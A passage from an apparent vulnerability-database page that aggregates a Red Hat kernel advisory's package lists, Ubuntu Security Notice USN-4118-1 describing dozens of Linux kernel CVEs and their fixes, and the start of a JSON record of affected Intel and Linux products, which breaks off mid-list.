ppc64: kernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-957.27.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-957.27.2.el7.ppc64.rpm perf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-957.27.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-957.27.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-957.27.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm kernel-doc-3.10.0-957.27.2.el7.noarch.rpm

x86_64: bpftool-3.10.0-957.27.2.el7.x86_64.rpm kernel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-devel-3.10.0-957.27.2.el7.x86_64.rpm kernel-headers-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm perf-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXT8OHtzjgjWX9erEAQjJ6hAAkyTYDPmFaW3TIWmrAC3QWuCJt3uBLlcX GNpw9Uqpj1yCc+ThaYobWnCMiSAFbPSs0A2iZnXiaM+pbsZj2MIfWRoTehoTZFDl 60VRCW4218Id3MYioJgtgyKvGX/Ol1LLlr4VtqIL8sTUZjhV7gqN3wlRvQSHcaOW yIaxzWO+ci8XTQ/glXwpAfmLPsd5urYnU2IyCv+5NDvKl9TFAPFqpS8xWDnQHgT1 o82j4MQhcZPjc0n7iawrLsuCegbyATN17M0JcGi4mdoghkem2X0PWR52cpyN7Isi bF8x4tJv9d3IUp8Wxsk1iz0dl94F4KWJ8sP7+ScT9SForWAss4WZ9s3Kb8z7ouIO zzHW0C3Si2DYXxqgc/H2RAcf31sRxAzltNuiVibAyrW2gKCFw0Cdwy+U3zSloY/M gb3kmQQQlZrezdxvDb/vVqD6jqIhPx4ewUVIBptyvnB7Ax23K00kP6FBZoXGdbhd t/9e+kykPXHyi0UZXBmF/JqTj6Z0X/aA+RoqsZovHZnXZ4hrST8pYxMUsWZ6LT1O sxmMlId4rPN9TgW6CxxziWnMwl4XEjWIby06vxY+tATYCk0LhkOqnQ8FdU/33rYm pI0ov4cV/T5rCBdIvGKDZumykq6eOWfIEVEZA36cs7iBgVCNYocmwKSFEVfJumpP kB2g6E6xyDg=SfsH -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================= Ubuntu Security Notice USN-4118-1 September 02, 2019

linux-aws vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 18.04 LTS
  • Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems

Details:

It was discovered that the alarmtimer implementation in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. (CVE-2018-13053)

Wen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly track inode validations. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13093)

Wen Xu discovered that the f2fs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious f2fs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13096, CVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14615, CVE-2018-14616)

Wen Xu and Po-Ning Tseng discovered that btrfs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious btrfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613)

Wen Xu discovered that the HFS+ filesystem implementation in the Linux kernel did not properly handle malformed catalog data in some situations. An attacker could use this to construct a malicious HFS+ image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14617)

Vasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem of the Linux kernel did not properly initialize new files in some situations. A local attacker could use this to expose sensitive information. (CVE-2018-16862)

Hui Peng and Mathias Payer discovered that the Option USB High Speed driver in the Linux kernel did not properly validate metadata received from the device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2018-19985)

Hui Peng and Mathias Payer discovered that the USB subsystem in the Linux kernel did not properly handle size checks when handling an extra USB descriptor. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2018-20169)

Zhipeng Xie discovered that an infinite loop could triggered in the CFS Linux kernel process scheduler. A local attacker could possibly use this to cause a denial of service. (CVE-2018-20784)

It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)

Eli Biham and Lior Neumann discovered that the Bluetooth implementation in the Linux kernel did not properly validate elliptic curve parameters during Diffie-Hellman key exchange in some situations. An attacker could use this to expose sensitive information. (CVE-2018-5383)

It was discovered that the Intel wifi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). A physically proximate attacker could use this to cause a denial of service (wifi disconnect). (CVE-2019-0136)

It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)

It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. A local attacker could use this to cause a denial of service. (CVE-2019-10207)

Amit Klein and Benny Pinkas discovered that the Linux kernel did not sufficiently randomize IP ID values generated for connectionless networking protocols. A remote attacker could use this to track particular Linux devices. (CVE-2019-10638)

Amit Klein and Benny Pinkas discovered that the location of kernel addresses could exposed by the implementation of connection-less network protocols in the Linux kernel. (CVE-2019-10639)

Adam Zabrocki discovered that the Intel i915 kernel mode graphics driver in the Linux kernel did not properly restrict mmap() ranges in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-11085)

It was discovered that an integer overflow existed in the Linux kernel when reference counting pages, leading to potential use-after-free issues. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-11487)

Jann Horn discovered that a race condition existed in the Linux kernel when performing core dumps. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2019-11599)

It was discovered that a null pointer dereference vulnerability existed in the LSI Logic MegaRAID driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-11810)

It was discovered that a race condition leading to a use-after-free existed in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel. The RDS protocol is blacklisted by default in Ubuntu. If enabled, a local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-11815)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)

It was discovered that the Bluetooth Human Interface Device Protocol (HIDP) implementation in the Linux kernel did not properly verify strings were NULL terminated in certain situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11884)

It was discovered that a NULL pointer dereference vulnerabilty existed in the Near-field communication (NFC) implementation in the Linux kernel. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12818)

It was discovered that the MDIO bus devices subsystem in the Linux kernel improperly dropped a device reference in an error condition, leading to a use-after-free. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12819)

It was discovered that a NULL pointer dereference vulnerability existed in the Near-field communication (NFC) implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-13233)

Jann Horn discovered that the ptrace implementation in the Linux kernel did not properly record credentials in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2019-13272)

It was discovered that the GTCO tablet input driver in the Linux kernel did not properly bounds check the initial HID report sent by the device. A physically proximate attacker could use to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-13631)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)

Tuba Yavuz discovered that a race condition existed in the DesignWare USB3 DRD Controller device driver in the Linux kernel. A physically proximate attacker could use this to cause a denial of service. (CVE-2019-14763)

It was discovered that an out-of-bounds read existed in the QLogic QEDI iSCSI Initiator Driver in the Linux kernel. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2019-15090)

It was discovered that the Raremono AM/FM/SW radio device driver in the Linux kernel did not properly allocate memory, leading to a use-after-free. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2019-15211)

It was discovered at a double-free error existed in the USB Rio 500 device driver for the Linux kernel. A physically proximate attacker could use this to cause a denial of service. (CVE-2019-15212)

It was discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) subsystem of the Linux kernel, leading to a potential use-after-free. A physically proximate attacker could use this to cause a denial of service (system crash) pro possibly execute arbitrary code. (CVE-2019-15214)

It was discovered that a race condition existed in the CPiA2 video4linux device driver for the Linux kernel, leading to a use-after-free. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-15215)

It was discovered that a race condition existed in the Softmac USB Prism54 device driver in the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15220)

It was discovered that a use-after-free vulnerability existed in the Appletalk implementation in the Linux kernel if an error occurs during initialization. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-15292)

It was discovered that the Empia EM28xx DVB USB device driver implementation in the Linux kernel contained a use-after-free vulnerability when disconnecting the device. An attacker could use this to cause a denial of service (system crash). (CVE-2019-2024)

It was discovered that the USB video device class implementation in the Linux kernel did not properly validate control bits, resulting in an out of bounds buffer read. A local attacker could use this to possibly expose sensitive information (kernel memory). (CVE-2019-2101)

It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)

Jason Wang discovered that an infinite loop vulnerability existed in the virtio net driver in the Linux kernel. A local attacker in a guest VM could possibly use this to cause a denial of service in the host system. (CVE-2019-3900)

Daniele Antonioli, Nils Ole Tippenhauer, and Kasper B. Rasmussen discovered that the Bluetooth protocol BR/EDR specification did not properly require sufficiently strong encryption key lengths. A physicall proximate attacker could use this to expose sensitive information. (CVE-2019-9506)

It was discovered that the Appletalk IP encapsulation driver in the Linux kernel did not properly prevent kernel addresses from being copied to user space. A local attacker with the CAP_NET_ADMIN capability could use this to expose sensitive information. (CVE-2018-20511)

It was discovered that a race condition existed in the USB YUREX device driver in the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15216)

It was discovered that the Siano USB MDTV receiver device driver in the Linux kernel made improper assumptions about the device characteristics. A physically proximate attacker could use this cause a denial of service (system crash). (CVE-2019-15218)

It was discovered that the Line 6 POD USB device driver in the Linux kernel did not properly validate data size information from the device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15221)

Muyu Yu discovered that the CAN implementation in the Linux kernel in some situations did not properly restrict the field size when processing outgoing frames. A local attacker with CAP_NET_ADMIN privileges could use this to execute arbitrary code. (CVE-2019-3701)

Vladis Dronov discovered that the debug interface for the Linux kernel's HID subsystem did not properly validate passed parameters in some situations. A local privileged attacker could use this to cause a denial of service (infinite loop). (CVE-2019-3819)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 18.04 LTS: linux-image-4.15.0-1047-aws 4.15.0-1047.49 linux-image-aws 4.15.0.1047.46

Ubuntu 16.04 LTS: linux-image-4.15.0-1047-aws 4.15.0-1047.49~16.04.1 linux-image-aws-hwe 4.15.0.1047.47

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4118-1 CVE-2018-13053, CVE-2018-13093, CVE-2018-13096, CVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100, CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14614, CVE-2018-14615, CVE-2018-14616, CVE-2018-14617, CVE-2018-16862, CVE-2018-19985, CVE-2018-20169, CVE-2018-20511, CVE-2018-20784, CVE-2018-20856, CVE-2018-5383, CVE-2019-0136, CVE-2019-10126, CVE-2019-10207, CVE-2019-10638, CVE-2019-10639, CVE-2019-11085, CVE-2019-11487, CVE-2019-11599, CVE-2019-11810, CVE-2019-11815, CVE-2019-11833, CVE-2019-11884, CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, CVE-2019-13233, CVE-2019-13272, CVE-2019-13631, CVE-2019-14283, CVE-2019-14284, CVE-2019-14763, CVE-2019-15090, CVE-2019-15211, CVE-2019-15212, CVE-2019-15214, CVE-2019-15215, CVE-2019-15216, CVE-2019-15218, CVE-2019-15220, CVE-2019-15221, CVE-2019-15292, CVE-2019-2024, CVE-2019-2101, CVE-2019-3701, CVE-2019-3819, CVE-2019-3846, CVE-2019-3900, CVE-2019-9506

Package Information: https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1047.49 https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1047.49~16.04.1 . Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

  • kernel-rt: update to the RHEL8.0.z batch#2 source tree (BZ#1717516)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201905-1057",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "i915",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "intel",
        "version": "5.0"
      },
      {
        "model": "acu wizard",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "active management technology",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "converged security management engine",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "driver and support assistant",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "dynamic application loader",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "i915",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "nuc board nuc7i7dnbe",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "nuc kit nuc7i5dnhe",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "nuc kit nuc7i7dnhe",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "nuc kit nuc7i7dnke",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "nuc kit nuc8i7hnk",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "nuc kit nuc8i7hvk",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "proset/wireless software driver",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "quartus ii programmer and tools",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "server platform services",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "trusted execution engine",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "intel",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "quartus prime",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "scs discovery utility",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "unite client",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "graphics driver",
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6.2"
      },
      {
        "model": "kernel 3.6-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.11-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.78"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.128"
      },
      {
        "model": "kernel 4.11-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "kernel 4.10-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.3"
      },
      {
        "model": "kernel 4.9-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.13-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.10"
      },
      {
        "model": "kernel 3.19-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.7"
      },
      {
        "model": "kernel 4.4-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.13.11"
      },
      {
        "model": "kernel 3.3-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.125"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel 4.1-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "kernel 4.7-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.0-57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "kernel 4.5-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.14.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.13"
      },
      {
        "model": "kernel 4.10-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel 4.5-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.1-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.11"
      },
      {
        "model": "kernel 3.14-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 4.12-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "kernel 3.10-rc5",
